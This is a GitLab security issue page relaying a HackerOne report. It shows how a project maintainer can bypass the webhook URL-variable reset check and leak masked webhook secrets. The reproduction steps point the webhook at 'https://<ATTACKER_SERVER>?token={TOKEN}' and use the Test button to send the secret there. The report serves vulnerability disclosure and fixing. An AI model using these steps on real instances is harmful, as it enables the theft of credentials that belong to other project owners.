Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #391685
Closed
Open
Issue created Feb 15, 2023 by GitLab SecurityBot@gitlab-securitybotReporter

Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report | Attachments | How To Reproduce

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

###  https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

###  ...

  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }  
 
###  ...

  def reset_url_variables  
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?  
  end

However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.

Steps to reproduce

As a project owner

  1. Create a project
  2. Add another user to the project as a maintainer
  3. Go to Settings > Webhooks
  4. Put the URL https://example.com?token=secret-token
  5. Click to add a mask
  6. Add the value secret-token with the replacement TOKEN
  7. Click save for the webhook

As a maintaner

  1. Open the project
  2. Go to Settings > Webhooks
  3. Click edit on the webhook
  4. Edit the URL to your controlled server like that: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
  5. Add the value aaaaa with the replacement A
  6. Save the webhook
  7. Now click Test to send a request
  8. Check your server logs; it will contain the secret in plain text
Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screen_Recording_2023-02-12_at_12.55.50.mov

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking